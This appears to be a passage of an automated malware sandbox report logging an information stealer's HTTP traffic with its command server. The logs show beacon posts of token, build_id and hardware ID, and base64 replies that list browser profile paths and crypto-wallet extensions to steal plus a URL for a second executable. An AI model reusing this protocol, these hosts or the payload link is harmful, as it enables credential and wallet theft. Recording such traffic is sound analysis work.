                                                                                                                                                                                                                                2024-09-21 11:35:30 UTC16355OUTData Raw: 2f 74 47 32 2f 35 37 78 66 39 39 69 75 46 59 44 44 52 36 2f 6a 35 33 2f 4d 39 57 65 62 34 36 70 65 36 33 38 69 6b 6b 64 31 45 30 46 73 31 6c 35 31 6a 46 61 76 61 79 6f 5a 4d 4e 4b 47 6d 4d 77 5a 54 6a 35 57 56 69 4d 63 45 63 63 67 35 78 55 38 6d 6f 4c 45 31 71 39 68 59 58 55 4e 33 62 6d 56 6b 6a 75 74 6b 79 74 4b 79 62 46 6d 5a 38 41 45 6f 43 51 45 38 76 48 63 74 32 71 62 2b 30 62 62 2f 41 4a 37 78 66 39 39 69 6a 2b 30 62 62 2f 6e 76 46 2f 33 32 4b 63 73 46 68 32 6d 6b 37 58 64 39 79 59 5a 6e 69 34 74 4e 78 75 30 72 4c 51 7a 37 6f 61 6c 39 6c 74 59 58 73 4c 61 56 72 64 62 6c 49 6e 74 59 6f 37 5a 55 57 65 45 78 73 4e 6b 61 41 48 6b 68 73 39 65 43 4f 2b 52 4c 5a 33 45 39 70 62 77 51 2f 77 42 6a 7a 6c 59 68 41 43 42 64 4d 4e 77 51 66 76 50 70 76 50 50 2b 7a
                                                                                                                                                                                                                                Data Ascii: /tG2/57xf99iuFYDDR6/j53/M9Web46pe638ikkd1E0Fs1l51jFavayoZMNKGmMwZTj5WViMcEccg5xU8moLE1q9hYXUN3bmVkjutkytKybFmZ8AEoCQE8vHct2qb+0bb/AJ7xf99ij+0bb/nvF/32KcsFh2mk7Xd9yYZni4tNxu0rLQz7oal9ltYXsLaVrdblIntYo7ZUWeExsNkaAHkhs9eCO+RLZ3E9pbwQ/wBjzlYhACBdMNwQfvPpvPP+z
                                                                                                                                                                                                                                2024-09-21 11:35:30 UTC16355OUTData Raw: 4d 4b 4b 4b 44 51 41 6c 46 46 46 41 78 4b 4b 4b 44 51 41 47 6b 70 65 31 4a 54 47 4a 52 52 51 61 41 45 6f 6f 6f 6f 47 4a 52 52 52 51 4d 4b 53 67 30 55 41 49 61 4b 4b 44 54 47 4a 51 65 6c 46 42 36 55 44 45 6f 6f 6f 6f 47 4a 52 52 52 51 41 6c 4a 53 30 6c 41 78 44 52 51 61 4b 42 67 61 53 6c 4e 4a 51 41 6c 4a 53 30 68 6f 4b 43 6b 70 61 53 67 59 55 6c 4c 53 55 44 45 6f 4e 46 42 6f 41 53 69 69 6b 6f 47 46 4a 53 30 6c 41 78 4b 4b 4b 4b 42 69 55 68 70 61 53 67 59 47 6b 70 54 53 55 44 45 6f 4e 46 42 6f 41 61 61 4b 44 52 54 47 42 70 4d 30 70 70 74 49 59 66 35 36 55 68 70 54 53 55 46 42 53 47 6c 70 44 30 6f 41 53 6b 70 61 53 6d 4d 4b 51 30 74 4a 51 55 42 70 44 51 61 44 51 43 45 6f 6f 6f 6f 47 4a 32 70 4b 55 30 6c 41 77 37 30 6e 53 69 69 67 61 45 4e 42 36 55 45 30 6c
                                                                                                                                                                                                                                Data Ascii: MKKKDQAlFFFAxKKKDQAGkpe1JTGJRRQaAEooooGJRRRQMKSg0UAIaKKDTGJQelFB6UDEooooGJRRRQAlJS0lAxDRQaKBgaSlNJQAlJS0hoKCkpaSgYUlLSUDEoNFBoASiikoGFJS0lAxKKKKBiUhpaSgYGkpTSUDEoNFBoAaaKDRTGBpM0pptIYf56UhpTSUFBSGlpD0oASkpaSmMKQ0tJQUBpDQaDQCEooooGJ2pKU0lAw70nSiigaENB6UE0l
                                                                                                                                                                                                                                2024-09-21 11:35:30 UTC7984OUTData Raw: 6e 4f 4f 6f 50 47 65 4b 47 72 41 64 4a 52 58 42 70 34 68 31 69 35 6a 73 4e 4e 69 2b 32 54 58 4c 50 64 4c 50 63 32 61 51 4c 4b 36 77 79 65 57 43 42 4b 51 67 4a 79 43 65 44 37 44 6e 49 75 52 58 50 69 47 65 66 53 62 43 36 75 5a 72 43 57 62 37 54 35 72 37 49 57 6c 64 45 4b 37 47 34 33 49 47 49 50 4f 4d 6a 6b 38 44 6a 41 74 51 36 32 4f 77 6f 72 69 49 4e 58 38 52 61 6a 64 53 58 64 6c 62 58 35 68 6a 76 57 67 57 4c 46 71 4c 64 6f 30 6b 32 4d 57 4c 4e 35 75 37 41 59 35 47 42 6e 48 42 48 58 54 38 5a 57 38 73 2b 6e 32 49 6a 76 4a 37 62 47 6f 57 77 4a 69 43 48 4f 5a 56 41 50 7a 4b 65 6e 55 66 72 6b 63 55 4c 70 35 68 33 38 6a 70 4b 4b 35 6c 47 31 50 56 62 33 55 34 59 4e 59 6e 73 6b 30 35 31 74 30 32 77 78 4d 5a 58 38 74 58 4c 79 62 6c 50 42 33 41 59 58 62 30 50 71 4d
                                                                                                                                                                                                                                Data Ascii: nOOoPGeKGrAdJRXBp4h1i5jsNNi+2TXLPdLPc2aQLK6wyeWCBKQgJyCeD7DnIuRXPiGefSbC6uZrCWb7T5r7IWldEK7G43IGIPOMjk8DjAtQ62OworiINX8RajdSXdlbX5hjvWgWLFqLdo0k2MWLN5u7AY5GBnHBHXT8ZW8s+n2IjvJ7bGoWwJiCHOZVAPzKenUfrkcULp5h38jpKK5lG1PVb3U4YNYnsk051t02wxMZX8tXLyblPB3AYXb0PqM
                                                                                                                                                                                                                                2024-09-21 11:35:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:31 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                31192.168.2.949789116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:33 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGH
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:33 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------BFIIEHJDBKJKECBFHDGHCont
                                                                                                                                                                                                                                2024-09-21 11:35:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:33 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:33 UTC103INData Raw: 35 63 0d 0a 4d 54 45 34 4d 44 55 79 4e 33 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 57 4e 69 4e 44 55 30 5a 44 4a 69 4e 47 46 66 62 47 64 6d 5a 48 4e 71 5a 32 52 7a 4c 6d 56 34 5a 58 77 78 66 47 74 72 61 32 74 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 5cMTE4MDUyN3xodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZWNiNDU0ZDJiNGFfbGdmZHNqZ2RzLmV4ZXwxfGtra2t80


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                32192.168.2.949791116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:37 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 499
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:37 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------CGHDAKKJJJKJKECBGCGDCont
                                                                                                                                                                                                                                2024-09-21 11:35:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:37 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                33192.168.2.949792116.203.165.127443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:38 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGH
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:38 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------DAFHIDGIJKJKECBGDBGHCont
                                                                                                                                                                                                                                2024-09-21 11:35:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:39 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                34192.168.2.949798116.203.165.127443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:46 UTC188OUTGET / HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:46 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                35192.168.2.949799116.203.165.127443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:47 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCG
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 256
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:47 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 31 43 45 31 36 43 46 45 35 33 34 32 32 38 33 31 39 34 30 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d
                                                                                                                                                                                                                                Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"C71CE16CFE534228319403-a33c7340-61ca------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------HDGCFHIDAKECFHIEBFCG--
                                                                                                                                                                                                                                2024-09-21 11:35:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:48 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:48 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 63 35 32 38 36 33 35 33 33 61 63 61 34 63 38 38 34 36 30 34 63 38 38 37 65 31 36 66 62 65 34 31 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 3a1|1|1|1|c52863533aca4c884604c887e16fbe41|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                36192.168.2.949800116.203.165.127443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:49 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHI
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:49 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 35 32 38 36 33 35 33 33 61 63 61 34 63 38 38 34 36 30 34 63 38 38 37 65 31 36 66 62 65 34 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="token"c52863533aca4c884604c887e16fbe41------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------GDHDAEBGCAAFIDGCGDHICont
                                                                                                                                                                                                                                2024-09-21 11:35:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:49 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:49 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                37192.168.2.949802116.203.165.127443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:50 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KEHCGCGCFHIDBFHIIJKJ
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 35 32 38 36 33 35 33 33 61 63 61 34 63 38 38 34 36 30 34 63 38 38 37 65 31 36 66 62 65 34 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------KEHCGCGCFHIDBFHIIJKJContent-Disposition: form-data; name="token"c52863533aca4c884604c887e16fbe41------KEHCGCGCFHIDBFHIIJKJContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------KEHCGCGCFHIDBFHIIJKJCont
                                                                                                                                                                                                                                2024-09-21 11:35:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:51 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:51 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                38192.168.2.949804116.203.165.127443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:52 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 332
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
